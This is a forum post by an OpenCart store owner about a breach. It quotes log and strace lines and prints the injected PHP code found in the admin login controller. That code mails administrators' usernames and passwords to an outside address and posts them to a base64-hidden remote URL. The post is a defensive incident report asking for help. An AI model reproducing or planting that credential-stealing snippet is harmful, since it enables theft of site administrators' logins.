We scanned the domain logs relative to when the files that were injected got changed, and here's what we've got:
Code: Select all
/home/........./logs/floridarealestateschool.com-ssl_log-Oct-2018.gz:185.189.150.77 - - [20/Oct/2018:12:59:22 -0400] "POST /enroll/admin/web.php HTTP/1.1" 200 29124 "https://floridarealestateschool.com/enroll/admin/web.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
Another message from our server techs had this information.
Firstly an strace of the process generated by the script /home/.../public_html/enroll/admin/index.php was performed. It was found that the following system call was being made which was taking a large amount of time to complete. It appears to be sending outbound traffic to the IP address "198.46.205.125".
22:52:10.583479 connect(8, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("198.46.205.125")}, 16) = -1 EINPROGRESS (Operation now in progress)
Next it was found that in the script /home/......./public_html/enroll/admin/controller/common/login.php the following malicious code had been injected.
Code: Select all
if($this->user->login($this->request->post['username'], $th is->request->post['password'])){$smail=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']."|".$this->request->post['username']."|".$this-> request->post['password'];mail("thankforyourhelp2015@gmail.com",$_SERVER['HTTP_HOST'],$smail,"From: admin@fly.com\r\nReply-to: thankf oryourhelp2015@gmail.com");$curl2=curl_init();curl_setopt($curl2,CURLOPT_RETURNTRANSFER,1);curl_setopt($curl2,CURLOPT_URL,base64_deco de('aHR0cDovL2FueXRoaW5ncHJvLm5ldC9nZXQyLnBocA=='));curl_setopt($curl2, CURLOPT_POST, 1);curl_setopt($curl2, CURLOPT_POSTFIELDS, 'mai ladmin='.urlencode($smail));curl_exec($curl2);curl_close($curl2);}.
It looks like this could have been used to siphon passwords and send them to a remote address.
I don't know how they managed to put the web.php page on our server. Any ideas?
We have run several scans to make sure there is no ore more malware, we have checked our databases and can't find anything that has been corrupted.
As soon as we found the problem (a couple days ago) we put the site in Maintenance mode and deleted the malicious code. We have also completely replaced the entire public_html with a copy from before the breach. We changed our usernames and passwords. At this point I have also changed the name of the admin folder and put it behind a .htaccess/.htpassword. Before this happened we already had ssh and sftp etc locked to specific IP addresses. The contact form and the returns forms already had captcha. I thought we were fairly secure, but now I am worried about other potential sources of security breaches. Is there anything else I should do to secure this OpenCart from hackers?
Sandra King